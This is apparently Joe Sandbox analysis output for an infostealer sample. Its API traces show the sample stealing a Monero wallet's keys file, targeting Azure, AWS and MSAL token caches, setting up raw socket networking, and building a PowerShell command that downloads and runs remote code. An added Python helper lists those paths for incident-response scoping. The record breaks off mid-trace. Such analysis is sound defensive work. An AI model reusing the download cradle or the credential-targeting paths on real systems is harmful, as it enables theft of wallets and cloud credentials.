                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB2242
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB227F
                                  • lstrlen.KERNEL32(01B9D580), ref: 00FB228D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB22B1
                                  • lstrcat.KERNEL32(00000000,01B9D580), ref: 00FB22B9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB22F7
                                  • lstrcat.KERNEL32(00000000), ref: 00FB2304
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB232D
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FB2356
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB2382
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB23BF
                                  • DeleteFileA.KERNEL32(00000000), ref: 00FB23F7
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FB2444
                                  • FindClose.KERNEL32(00000000), ref: 00FB2453
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                  • String ID:
                                  • API String ID: 2857443207-0
                                  • Opcode ID: 5a0d2e243e7071d9582b1a81f0ef588b9b03dfc7b5b924322a83353d36aca997
                                  • Instruction ID: 11089fd73b76b568fbc59b5043fc7faff7f4611457b30e273ffe8a8ac3a1f5d2
                                  • Opcode Fuzzy Hash: 5a0d2e243e7071d9582b1a81f0ef588b9b03dfc7b5b924322a83353d36aca997
                                  • Instruction Fuzzy Hash: 98E15D31A1120A9BDB61FFA6DC89AEE77F9AF44310F044024F915AB205DB38DD45EFA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6445
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6480
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00FC64AA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC64E1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6506
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC650E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6537
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FolderPathlstrcat
                                  • String ID: \..\
                                  • API String ID: 2938889746-4220915743
                                  • Opcode ID: c874359781409eb85901f24659e1fa24767f640be4fefc12aa9063a3b0e619f4
                                  • Instruction ID: 72508fdc0b64f2892ca8eff9ebdaaa7d22022eec8c16c614da6f0839910026dd
                                  • Opcode Fuzzy Hash: c874359781409eb85901f24659e1fa24767f640be4fefc12aa9063a3b0e619f4
                                  • Instruction Fuzzy Hash: 7BF1AC70D0520A9BDB25EFA9DD4ABAE77B9AF44314F04442CB815DB285DB38DC41EFA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC43A3
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC43D6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC43FE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC4409
                                  • lstrlen.KERNEL32(\storage\default\), ref: 00FC4414
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4431
                                  • lstrcat.KERNEL32(00000000,\storage\default\), ref: 00FC443D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4466
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC4471
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4498
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC44D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC44DF
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC44EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4507
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC4513
                                  • lstrlen.KERNEL32(.metadata-v2), ref: 00FC451E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC453B
                                  • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00FC4547
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC456E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC45A0
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00FC45A7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC4601
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC462A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC4653
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC467B
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC46AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                  • String ID: .metadata-v2$\storage\default\
                                  • API String ID: 1033685851-762053450
                                  • Opcode ID: 0925e974e1817c02982fae3c8f00f7c9b6055193437a01241bef7a603a5e1987
                                  • Instruction ID: a86e4cfe4fb8741ae2b6d54378c409ece464778552b516c394fe600ee1db3993
                                  • Opcode Fuzzy Hash: 0925e974e1817c02982fae3c8f00f7c9b6055193437a01241bef7a603a5e1987
                                  • Instruction Fuzzy Hash: D0B18F30A1120A9BDB25FFB5DE5AFAE77E9AF40314F140428B855E7245DB38EC41BB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC57D5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00FC5804
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5835
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC585D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC5868
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5890
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC58C8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC58D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC58F8
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC592E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5956
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC5961
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5988
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC599A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC59B9
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC59C5
                                  • lstrlen.KERNEL32(01B9D640), ref: 00FC59D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC59F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC5A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5A2C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5A58
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00FC5A5F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC5AB7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC5B2D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC5B56
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC5B89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5BB5
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC5BEF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC5C4C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5C70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2428362635-0
                                  • Opcode ID: 79a1695685408133a782c1c414fbd2ed2d5e54114902bd32017dbe5b389aee59
                                  • Instruction ID: df665085b7d800925e9e0b8166d85278da4fa295d870be5a17c9b64117d97b2e
                                  • Opcode Fuzzy Hash: 79a1695685408133a782c1c414fbd2ed2d5e54114902bd32017dbe5b389aee59
                                  • Instruction Fuzzy Hash: 0F02A771D116069BCB25EFA5C98AEEE7BF9AF44710F04412CF805A7241DB38ED85EB90
                                  APIs
                                    • Part of subcall function 00FB1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB1135
                                    • Part of subcall function 00FB1120: RtlAllocateHeap.NTDLL(00000000), ref: 00FB113C
                                    • Part of subcall function 00FB1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00FB1159
                                    • Part of subcall function 00FB1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00FB1173
                                    • Part of subcall function 00FB1120: RegCloseKey.ADVAPI32(?), ref: 00FB117D
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FB11C0
                                  • lstrlen.KERNEL32(?), ref: 00FB11CD
                                  • lstrcat.KERNEL32(?,.keys), ref: 00FB11E8
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB121F
                                  • lstrlen.KERNEL32(01B991C8), ref: 00FB122D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1251
                                  • lstrcat.KERNEL32(00000000,01B991C8), ref: 00FB1259
                                  • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00FB1264
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1288
                                  • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00FB1294
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB12BA
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB12FF
                                  • lstrlen.KERNEL32(01B9D580), ref: 00FB130E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1335
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB133D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1378
                                  • lstrcat.KERNEL32(00000000), ref: 00FB1385
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB13AC
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 00FB13D5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1401
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB143D
                                    • Part of subcall function 00FCEDE0: lstrcpy.KERNEL32(00000000,?), ref: 00FCEE12
                                  • DeleteFileA.KERNEL32(?), ref: 00FB1471
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                  • String ID: .keys$\Monero\wallet.keys
                                  • API String ID: 2881711868-3586502688
                                  • Opcode ID: cd0252518ce52223a28db8836e5fecf628f50b908f61864aa1f3a781ea90c59f
                                  • Instruction ID: 9240cff4587057221cdda7b88a3848c35ec1be5c748d31abbf104b203a0442fe
                                  • Opcode Fuzzy Hash: cd0252518ce52223a28db8836e5fecf628f50b908f61864aa1f3a781ea90c59f
                                  • Instruction Fuzzy Hash: 6CA16D71E112099BDB21EFA6DC99AEE77B9AF44310F440024F905E7241DB38EE41AFA1
                                  APIs
                                  • memset.MSVCRT ref: 00FCE740
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00FCE769
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE79F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCE7AD
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00FCE7C6
                                  • memset.MSVCRT ref: 00FCE805
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00FCE82D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE85F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCE86D
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00FCE886
                                  • memset.MSVCRT ref: 00FCE8C5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00FCE8F1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE920
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCE92E
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00FCE947
                                  • memset.MSVCRT ref: 00FCE986
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcat$memset$FolderPathlstrcpy
                                  • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 4067350539-3645552435
                                  • Opcode ID: afec855525382b69dbd179624f616dddb52624465810beafc24eade79d13b893
                                  • Instruction ID: 830b9d65f62ca72f461fd02c8f2d2be7428aa930abf239530f7369354903ea43
                                  • Opcode Fuzzy Hash: afec855525382b69dbd179624f616dddb52624465810beafc24eade79d13b893
                                  • Instruction Fuzzy Hash: 5F714A71E40259ABDB71EBA0DC46FED7778AF48700F4404A8B619AB1C0DB74AE84AF54
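The two routines above show where this sample goes for secrets. The first opens HKCU\SOFTWARE\monero-project\monero-core, reads wallet_path, appends .keys, falls back to a path ending in \Monero\wallet.keys, and then calls CopyFileA followed by DeleteFileA. The second calls SHGetFolderPathA with CSIDL 0x28 (CSIDL_PROFILE) and 0x1C (CSIDL_LOCAL_APPDATA), appends \.azure\, \.aws\ and \.IdentityService\, and looks for msal.cache. The helper below is an added incident-response scoping example, not code from the sample or from Joe Sandbox: it rebuilds the same target list for a host and reports which of those files actually exist, so a responder knows what the stealer could have read. Assumptions, marked in the code: the trace shows only the \Monero\wallet.keys suffix, so the folder it is appended to is a parameter (Documents by default); USERPROFILE and LOCALAPPDATA stand in for SHGetFolderPathA; the existence check is injectable so the path logic runs offline on any platform.

```python
"""Added IR scoping helper (not code from the sample or from Joe Sandbox).

Rebuilds the file targets implied by the two Stealc routines above and
reports which of them exist on a host, so a responder can tell what the
stealer could have read. ntpath is used so paths come out Windows-style
on any platform; the existence check is injectable for offline use.
"""
import ntpath
import os
import sys
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Registry location queried in the trace: RegOpenKeyExA(0x80000001 = HKCU, ...)
MONERO_KEY = r"SOFTWARE\monero-project\monero-core"
MONERO_VALUE = "wallet_path"


@dataclass(frozen=True)
class Target:
    label: str
    path: str
    exists: bool


def read_monero_wallet_path() -> Optional[str]:
    """Live lookup of the same registry value the sample reads (Windows only)."""
    if sys.platform != "win32":
        return None
    import winreg  # only available on Windows
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, MONERO_KEY) as key:
            value, _kind = winreg.QueryValueEx(key, MONERO_VALUE)
            return value or None
    except OSError:
        return None


def monero_wallet_keys_path(wallet_path: Optional[str], fallback_base: str) -> str:
    """Mirror the sample's construction: "<wallet_path>.keys" when the registry
    value is present, otherwise "<fallback_base>\\Monero\\wallet.keys".
    The trace shows only the "\\Monero\\wallet.keys" suffix; the folder it is
    appended to is an assumption and therefore a parameter."""
    if wallet_path:
        return wallet_path + ".keys"
    return ntpath.join(fallback_base, "Monero", "wallet.keys")


def credential_store_paths(profile_dir: str, local_appdata_dir: str) -> Dict[str, str]:
    """SHGetFolderPathA(0x28) is CSIDL_PROFILE and 0x1C is CSIDL_LOCAL_APPDATA;
    the sample appends \\.azure\\, \\.aws\\ and \\.IdentityService\\ and looks
    for msal.cache, the MSAL token cache Microsoft developer tooling keeps there."""
    return {
        ".azure": ntpath.join(profile_dir, ".azure"),
        ".aws": ntpath.join(profile_dir, ".aws"),
        ".IdentityService": ntpath.join(local_appdata_dir, ".IdentityService"),
        "msal.cache": ntpath.join(local_appdata_dir, ".IdentityService", "msal.cache"),
    }


def enumerate_targets(profile_dir: str, local_appdata_dir: str, fallback_base: str,
                      wallet_path: Optional[str] = None,
                      exists: Callable[[str], bool] = os.path.exists) -> List[Target]:
    """Full target list with an existence flag per path."""
    paths = {"monero wallet .keys": monero_wallet_keys_path(wallet_path, fallback_base)}
    paths.update(credential_store_paths(profile_dir, local_appdata_dir))
    return [Target(label, path, bool(exists(path))) for label, path in paths.items()]


def exposed(targets: List[Target]) -> List[str]:
    """Labels of the targets that actually exist, in evaluation order."""
    return [t.label for t in targets if t.exists]


def host_report() -> List[Target]:
    """Run against the current user; environment variables stand in for
    SHGetFolderPathA and Documents is the assumed fallback base."""
    profile = os.environ.get("USERPROFILE", "")
    local = os.environ.get("LOCALAPPDATA", ntpath.join(profile, "AppData", "Local"))
    return enumerate_targets(profile, local, ntpath.join(profile, "Documents"),
                             read_monero_wallet_path())


if __name__ == "__main__":
    for t in host_report():
        print(("EXPOSED " if t.exists else "absent  ") + t.label + ": " + t.path)
```

Run it as the affected user on the infected host; every EXPOSED line is a credential store to rotate (AWS access keys in .aws\credentials, Azure CLI tokens in .azure, MSAL refresh tokens in msal.cache, and the Monero wallet if its .keys file was present).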
                                  APIs
                                  • lstrcpy.KERNEL32 ref: 00FCABCF
                                  • lstrlen.KERNEL32(01B9E0A0), ref: 00FCABE5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAC0D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FCAC18
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAC41
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAC84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FCAC8E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCACB7
                                  • lstrlen.KERNEL32(00FE4AD4), ref: 00FCACD1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCACF3
                                  • lstrcat.KERNEL32(00000000,00FE4AD4), ref: 00FCACFF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAD28
                                  • lstrlen.KERNEL32(00FE4AD4), ref: 00FCAD3A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAD5C
                                  • lstrcat.KERNEL32(00000000,00FE4AD4), ref: 00FCAD68
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAD91
                                  • lstrlen.KERNEL32(01B9E118), ref: 00FCADA7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCADCF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FCADDA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAE03
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCAE3F
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FCAE49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAE6F
                                  • lstrlen.KERNEL32(00000000), ref: 00FCAE85
                                  • lstrcpy.KERNEL32(00000000,01B9E160), ref: 00FCAEB8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen
                                  • String ID: f
                                  • API String ID: 2762123234-1993550816
                                  • Opcode ID: 98cce34040e405e46f035204b609be81b241bc414768a8782fceb48fe0b6c111
                                  • Instruction ID: dbbe1652088c51d80508493e2c4cf4f56ea14ae2e87f30ecd196670a3b8e8685
                                  • Opcode Fuzzy Hash: 98cce34040e405e46f035204b609be81b241bc414768a8782fceb48fe0b6c111
                                  • Instruction Fuzzy Hash: 8BB1823091051B9BCB22EFA5DD49BAFB7B9BF40318F040528B415E7245DB38ED41EB92
                                  APIs
                                  • LoadLibraryA.KERNEL32(ws2_32.dll,?,00FC72A4), ref: 00FD47E6
                                  • GetProcAddress.KERNEL32(00000000,connect), ref: 00FD47FC
                                  • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00FD480D
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00FD481E
                                  • GetProcAddress.KERNEL32(00000000,htons), ref: 00FD482F
                                  • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00FD4840
                                  • GetProcAddress.KERNEL32(00000000,recv), ref: 00FD4851
                                  • GetProcAddress.KERNEL32(00000000,socket), ref: 00FD4862
                                  • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00FD4873
                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00FD4884
                                  • GetProcAddress.KERNEL32(00000000,send), ref: 00FD4895
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                  • API String ID: 2238633743-3087812094
                                  • Opcode ID: 7e034b2763f63039c592fc1fec160f80eaa62b79990c657be83522bc4fac1e4a
                                  • Instruction ID: 5dbb005bffb35f98fcb61062750f322568aece9a307e2301b60bb670e0d816c3
                                  • Opcode Fuzzy Hash: 7e034b2763f63039c592fc1fec160f80eaa62b79990c657be83522bc4fac1e4a
                                  • Instruction Fuzzy Hash: 2A117CF1952764AB87389FF6A80DA553EFCBB09B0D344083AF571DA188D6F88580EB51
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCBE53
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCBE86
                                  • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00FCBE91
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCBEB1
                                  • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00FCBEBD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCBEE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FCBEEB
                                  • lstrlen.KERNEL32(')"), ref: 00FCBEF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCBF13
                                  • lstrcat.KERNEL32(00000000,')"), ref: 00FCBF1F
